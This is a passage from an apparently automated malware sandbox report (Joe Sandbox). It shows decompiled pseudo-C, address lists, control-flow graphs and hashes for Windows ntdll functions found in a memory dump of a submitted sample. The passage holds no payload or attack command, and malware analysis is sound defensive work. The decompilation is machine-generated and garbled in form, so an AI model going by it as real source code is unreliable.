						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x18ef5e0
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E1D7BF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1d8891e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f107c
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1D7A24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1D7A2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1D7A2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1D7A24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1D7A2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f107c
										E1D81C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f107c
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f107c
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1D7BF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x18ef5e0
									_t86 = _t255 + 0x10; // 0x18f107c
									 *0x1d8891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1d8891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1d8891e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1D7A3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x18f107c
										_t250 = E1D81C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1D7BF1DB(_t250);
									_t228 = E1D7BF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x18f107c
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}
































                                                    0x1d7bee48
                                                    0x1d7bee4a
                                                    0x1d7bee4f
                                                    0x1d7bee54
                                                    0x1d7bee56
                                                    0x1d7bee5b
                                                    0x1d7bee60
                                                    0x1d7bee63
                                                    0x1d7bee66
                                                    0x1d7bee68
                                                    0x1d7bee70
                                                    0x1d7bee73
                                                    0x1d7bee76
                                                    0x1d7bee79
                                                    0x1d7bee80
                                                    0x1d7bee85
                                                    0x1d7bee88
                                                    0x00000000
                                                    0x1d7bee8b
                                                    0x1d7bee93
                                                    0x1d7bee98
                                                    0x1d7bee9f
                                                    0x1d7beeac
                                                    0x1d7beeb8
                                                    0x1d7beeb8
                                                    0x1d7beebe
                                                    0x1d7beec6
                                                    0x1d7beec9
                                                    0x1d7beec9
                                                    0x1d7beece
                                                    0x1d7beece
                                                    0x1d7beece
                                                    0x1d7beece
                                                    0x1d7beece
                                                    0x1d7beece
                                                    0x1d7beed3
                                                    0x1d7beed6
                                                    0x1d7beedb
                                                    0x1d7beee0
                                                    0x1d7beee6
                                                    0x1d7beeee
                                                    0x1d7beeee
                                                    0x1d7beef0
                                                    0x1d7beef4
                                                    0x1d7beef6
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf1dc
                                                    0x1d7bf1dc
                                                    0x1d7beefc
                                                    0x1d7beefc
                                                    0x1d7bef01
                                                    0x1d7bef03
                                                    0x1d7bef06
                                                    0x1d7bef09
                                                    0x1d7bef0c
                                                    0x1d7bef0f
                                                    0x1d7bef0f
                                                    0x1d7bef16
                                                    0x1d7bef16
                                                    0x1d7bef1b
                                                    0x1d7bef20
                                                    0x1d7bef26
                                                    0x1d7bef29
                                                    0x1d7bef2c
                                                    0x1d7bef2c
                                                    0x1d7bef36
                                                    0x1d7bef36
                                                    0x1d7bef3b
                                                    0x1d7bef40
                                                    0x1d7bef46
                                                    0x1d7bef4c
                                                    0x1d7bef54
                                                    0x1d7bef57
                                                    0x1d7bef59
                                                    0x1d7bef60
                                                    0x1d7bef63
                                                    0x1d7bef63
                                                    0x1d7bef66
                                                    0x1d7bef69
                                                    0x1d7bef6c
                                                    0x1d7bf113
                                                    0x1d7bf113
                                                    0x1d7bf115
                                                    0x1d7bf122
                                                    0x1d7bf127
                                                    0x1d7bf12b
                                                    0x1d7ffe64
                                                    0x1d7ffe6a
                                                    0x1d7ffe6a
                                                    0x00000000
                                                    0x1d7bf12b
                                                    0x1d7bef72
                                                    0x1d7bef74
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bef7a
                                                    0x1d7bef7d
                                                    0x1d7bef7d
                                                    0x1d7bef7d
                                                    0x1d7bef81
                                                    0x1d7bf144
                                                    0x1d7bf144
                                                    0x1d7bf14a
                                                    0x1d7ffd20
                                                    0x1d7ffd23
                                                    0x1d7bef90
                                                    0x1d7bef90
                                                    0x1d7bef93
                                                    0x1d7ffd2e
                                                    0x1d7ffd31
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ffd37
                                                    0x1d7ffd45
                                                    0x1d7ffd4b
                                                    0x1d7ffd4b
                                                    0x1d7ffd4e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ffd54
                                                    0x1d7ffd3c
                                                    0x1d7ffd3f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ffd3f
                                                    0x1d7bef99
                                                    0x1d7bef99
                                                    0x1d7bef9c
                                                    0x1d7bf1a6
                                                    0x1d7bf1a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf1af
                                                    0x1d7befa2
                                                    0x1d7befa2
                                                    0x1d7befa5
                                                    0x1d7befab
                                                    0x1d7befae
                                                    0x1d7befb4
                                                    0x1d7befba
                                                    0x1d7befc0
                                                    0x1d7befc6
                                                    0x1d7befcc
                                                    0x1d7befd8
                                                    0x1d7befde
                                                    0x1d7befe1
                                                    0x1d7befe7
                                                    0x1d7befe9
                                                    0x1d7befec
                                                    0x1d7beff3
                                                    0x1d7beff8
                                                    0x1d7beffa
                                                    0x1d7befff
                                                    0x1d7bf002
                                                    0x1d7bf008
                                                    0x1d7bf00a
                                                    0x1d7bf15d
                                                    0x1d7bf164
                                                    0x1d7bf165
                                                    0x1d7bf168
                                                    0x1d7bf16b
                                                    0x1d7bf16e
                                                    0x1d7bf170
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf176
                                                    0x1d7bf17a
                                                    0x1d7bf1c8
                                                    0x1d7bf1cf
                                                    0x1d7bf1d0
                                                    0x1d7bf1d3
                                                    0x00000000
                                                    0x1d7bf1d3
                                                    0x1d7bf17c
                                                    0x1d7bf105
                                                    0x1d7bf105
                                                    0x1d7bf108
                                                    0x1d7bf10a
                                                    0x1d7bf1b7
                                                    0x1d7bf1b7
                                                    0x1d7bf110
                                                    0x00000000
                                                    0x1d7bf110
                                                    0x1d7bf010
                                                    0x1d7bf010
                                                    0x1d7bf013
                                                    0x1d7bf0a2
                                                    0x1d7bf0a2
                                                    0x1d7bf0a6
                                                    0x1d7bf186
                                                    0x1d7bf186
                                                    0x1d7bf0ac
                                                    0x1d7bf0b0
                                                    0x1d7ffe56
                                                    0x1d7ffe56
                                                    0x1d7bf103
                                                    0x1d7bf103
                                                    0x00000000
                                                    0x1d7bf103
                                                    0x1d7bf0bc
                                                    0x1d7bf0c3
                                                    0x1d7bf0c4
                                                    0x1d7bf0c7
                                                    0x1d7bf0ce
                                                    0x1d7ffe35
                                                    0x1d7ffe35
                                                    0x1d7ffe39
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ffe41
                                                    0x1d7ffe41
                                                    0x1d7ffe42
                                                    0x1d7ffe48
                                                    0x1d7ffe51
                                                    0x00000000
                                                    0x1d7ffe51
                                                    0x1d7bf0d4
                                                    0x1d7bf0db
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf0e1
                                                    0x1d7bf0e5
                                                    0x1d7bf193
                                                    0x1d7bf199
                                                    0x1d7bf19b
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf0f4
                                                    0x1d7bf0f4
                                                    0x1d7bf0f8
                                                    0x1d7bf0fa
                                                    0x1d7bf0fd
                                                    0x1d7ffe1e
                                                    0x1d7ffe21
                                                    0x1d7ffe24
                                                    0x1d7ffe27
                                                    0x1d7ffe2a
                                                    0x1d7ffe2d
                                                    0x1d7ffe2d
                                                    0x1d7bf0fd
                                                    0x00000000
                                                    0x1d7bf0f8
                                                    0x1d7bf0eb
                                                    0x1d7bf0ee
                                                    0x1d7bf0f1
                                                    0x00000000
                                                    0x1d7bf0f1
                                                    0x1d7bf01c
                                                    0x1d7bf01f
                                                    0x1d7bf02a
                                                    0x1d7bf02d
                                                    0x1d7bf030
                                                    0x1d7bf034
                                                    0x1d7bf036
                                                    0x1d7bf039
                                                    0x1d7bf045
                                                    0x1d7bf051
                                                    0x1d7bf05a
                                                    0x1d7bf05a
                                                    0x1d7bf05d
                                                    0x1d7bf060
                                                    0x1d7bf062
                                                    0x1d7ffd59
                                                    0x1d7ffd5c
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ffd62
                                                    0x1d7ffd66
                                                    0x1d7ffd72
                                                    0x1d7ffd84
                                                    0x1d7ffd8a
                                                    0x1d7ffd8d
                                                    0x1d7ffd90
                                                    0x00000000
                                                    0x1d7ffd90
                                                    0x1d7ffd68
                                                    0x1d7ffd6c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf068
                                                    0x1d7bf068
                                                    0x1d7bf068
                                                    0x1d7bf06d
                                                    0x1d7ffd98
                                                    0x1d7ffda8
                                                    0x1d7ffdae
                                                    0x1d7ffdae
                                                    0x1d7bf073
                                                    0x1d7bf078
                                                    0x1d7bf07a
                                                    0x1d7ffdbf
                                                    0x1d7bf080
                                                    0x1d7bf080
                                                    0x1d7bf080
                                                    0x1d7bf085
                                                    0x1d7bf088
                                                    0x1d7ffde1
                                                    0x1d7ffde4
                                                    0x1d7ffde4
                                                    0x1d7bf08e
                                                    0x1d7bf095
                                                    0x1d7bf09d
                                                    0x00000000
                                                    0x1d7bf09d
                                                    0x1d7bf062
                                                    0x1d7ffd29
                                                    0x1d7bf150
                                                    0x1d7bf153
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf155
                                                    0x1d7bef87
                                                    0x1d7bef8a
                                                    0x1d7bf136
                                                    0x1d7bf13c
                                                    0x1d7bf13e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7bf13e
                                                    0x00000000
                                                    0x1d7bef8a

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d6db5f95fdc17d3dd9018e2bf36ada01a35ca4bd540de184984f28f3f8f44ae1
                                                    • Instruction ID: cabfa7378af7b4d3cb49e6cfad9420db46eda11613ba03e2a52fda663986ff2f
                                                    • Opcode Fuzzy Hash: d6db5f95fdc17d3dd9018e2bf36ada01a35ca4bd540de184984f28f3f8f44ae1
                                                    • Instruction Fuzzy Hash: 98E1FE76D00648DFCB25CFA9D984A9DFBF1BF48720F20492AE556A7360D732A940CF52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D86A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1035 1d86a1f0-1d86a269 call 1d7a2330 * 2 RtlDebugPrintTimes 1041 1d86a41f-1d86a444 call 1d7a24d0 * 2 call 1d7d4b50 1035->1041 1042 1d86a26f-1d86a27a 1035->1042 1044 1d86a2a4 1042->1044 1045 1d86a27c-1d86a289 1042->1045 1049 1d86a2a8-1d86a2b4 1044->1049 1047 1d86a28f-1d86a295 1045->1047 1048 1d86a28b-1d86a28d 1045->1048 1051 1d86a373-1d86a375 1047->1051 1052 1d86a29b-1d86a2a2 1047->1052 1048->1047 1053 1d86a2c1-1d86a2c3 1049->1053 1055 1d86a39f-1d86a3a1 1051->1055 1052->1049 1056 1d86a2b6-1d86a2bc 1053->1056 1057 1d86a2c5-1d86a2c7 1053->1057 1058 1d86a3a7-1d86a3b4 1055->1058 1059 1d86a2d5-1d86a2fd RtlDebugPrintTimes 1055->1059 1061 1d86a2be 1056->1061 1062 1d86a2cc-1d86a2d0 1056->1062 1057->1055 1064 1d86a3b6-1d86a3c3 1058->1064 1065 1d86a3da-1d86a3e6 1058->1065 1059->1041 1071 1d86a303-1d86a320 RtlDebugPrintTimes 1059->1071 1061->1053 1063 1d86a3ec-1d86a3ee 1062->1063 1063->1055 1068 1d86a3c5-1d86a3c9 1064->1068 1069 1d86a3cb-1d86a3d1 1064->1069 1070 1d86a3fb-1d86a3fd 1065->1070 1068->1069 1072 1d86a3d7 1069->1072 1073 1d86a4eb-1d86a4ed 1069->1073 1074 1d86a3f0-1d86a3f6 1070->1074 1075 1d86a3ff-1d86a401 1070->1075 1071->1041 1083 1d86a326-1d86a34c RtlDebugPrintTimes 1071->1083 1072->1065 1076 1d86a403-1d86a409 1073->1076 1077 1d86a447-1d86a44b 1074->1077 1078 1d86a3f8 1074->1078 1075->1076 1079 1d86a450-1d86a474 RtlDebugPrintTimes 1076->1079 1080 1d86a40b-1d86a41d RtlDebugPrintTimes 1076->1080 1082 1d86a51f-1d86a521 1077->1082 1078->1070 1079->1041 1087 1d86a476-1d86a493 RtlDebugPrintTimes 1079->1087 1080->1041 1083->1041 1088 1d86a352-1d86a354 1083->1088 1087->1041 1092 1d86a495-1d86a4c4 RtlDebugPrintTimes 1087->1092 1090 1d86a356-1d86a363 1088->1090 1091 1d86a377-1d86a38a 1088->1091 1093 1d86a365-1d86a369 1090->1093 1094 1d86a36b-1d86a371 1090->1094 1095 1d86a397-1d86a399 1091->1095 1092->1041 1101 1d86a4ca-1d86a4cc 1092->1101 1093->1094 1094->1051 1094->1091 1096 1d86a38c-1d86a392 1095->1096 1097 1d86a39b-1d86a39d 1095->1097 1098 1d86a394 1096->1098 1099 1d86a3e8-1d86a3ea 1096->1099 1097->1055 1098->1095 1099->1063 1102 1d86a4f2-1d86a505 1101->1102 1103 1d86a4ce-1d86a4db 1101->1103 1106 1d86a512-1d86a514 1102->1106 1104 1d86a4e3-1d86a4e9 1103->1104 1105 1d86a4dd-1d86a4e1 1103->1105 1104->1073 1104->1102 1105->1104 1107 1d86a516 1106->1107 1108 1d86a507-1d86a50d 1106->1108 1107->1075 1109 1d86a50f 1108->1109 1110 1d86a51b-1d86a51d 1108->1110 1109->1106 1110->1082
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: HEAP:
                                                    • API String ID: 3446177414-2466845122
                                                    • Opcode ID: 361c9a4d42c521e8552b1e420d5d1bf3e037ed417927146f8e58a6c8b9bff1bf
                                                    • Instruction ID: 5d9e03acbeb4399b9cec2bd83274b9557030dc3e221880aab435e1bbd8f26e93
                                                    • Opcode Fuzzy Hash: 361c9a4d42c521e8552b1e420d5d1bf3e037ed417927146f8e58a6c8b9bff1bf
                                                    • Instruction Fuzzy Hash: E2A17A75A082128FC705CF19C894A2BB7E5FF88B64F05456EE946DB321E770EC45CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7C7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1111 1d7c7550-1d7c7571 1112 1d7c75ab-1d7c75b9 call 1d7d4b50 1111->1112 1113 1d7c7573-1d7c758f call 1d79e580 1111->1113 1118 1d804443 1113->1118 1119 1d7c7595-1d7c75a2 1113->1119 1122 1d80444a-1d804450 1118->1122 1120 1d7c75ba-1d7c75c9 call 1d7c7738 1119->1120 1121 1d7c75a4 1119->1121 1129 1d7c75cb-1d7c75e1 call 1d7c76ed 1120->1129 1130 1d7c7621-1d7c762a 1120->1130 1121->1112 1124 1d804456-1d8044c3 call 1d81ef10 call 1d7d8f40 RtlDebugPrintTimes BaseQueryModuleData 1122->1124 1125 1d7c75e7-1d7c75f0 call 1d7c7648 1122->1125 1124->1125 1143 1d8044c9-1d8044d1 1124->1143 1125->1130 1135 1d7c75f2 1125->1135 1129->1122 1129->1125 1133 1d7c75f8-1d7c7601 1130->1133 1137 1d7c762c-1d7c762e 1133->1137 1138 1d7c7603-1d7c7612 call 1d7c763b 1133->1138 1135->1133 1142 1d7c7614-1d7c7616 1137->1142 1138->1142 1145 1d7c7618-1d7c761a 1142->1145 1146 1d7c7630-1d7c7639 1142->1146 1143->1125 1147 1d8044d7-1d8044de 1143->1147 1145->1121 1148 1d7c761c 1145->1148 1146->1145 1147->1125 1149 1d8044e4-1d8044ef 1147->1149 1150 1d8045c9-1d8045db call 1d7d2b70 1148->1150 1152 1d8045c4 call 1d7d4c68 1149->1152 1153 1d8044f5-1d80452e call 1d81ef10 call 1d7da9c0 1149->1153 1150->1121 1152->1150 1160 1d804530-1d804541 call 1d81ef10 1153->1160 1161 1d804546-1d804576 call 1d81ef10 1153->1161 1160->1130 1161->1125 1166 1d80457c-1d80458a call 1d7da690 1161->1166 1169 1d804591-1d8045ae call 1d81ef10 call 1d80cc1e 1166->1169 1170 1d80458c-1d80458e 1166->1170 1169->1125 1175 1d8045b4-1d8045bd 1169->1175 1170->1169 1175->1166 1176 1d8045bf 1175->1176 1176->1125
                                                    C-Code - Quality: 63%
                                                    			E1D7C7550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1d88b370 ^ _t107;
				_v8 =  *0x1d88b370 ^ _t107;
				_t105 = __ecx;
				if( *0x1d886664 == 0) {
					L5:
					return E1D7D4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E1D79E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E1D7C7738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E1D7C763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E1D7D2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E1D7C76ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E1D81EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E1D7D8F40( &_v548, 0, 0x214);
						_t106 =  *0x1d886664;
						_t110 = _t108 + 0x20;
						 *0x1d8891e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x1d886664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
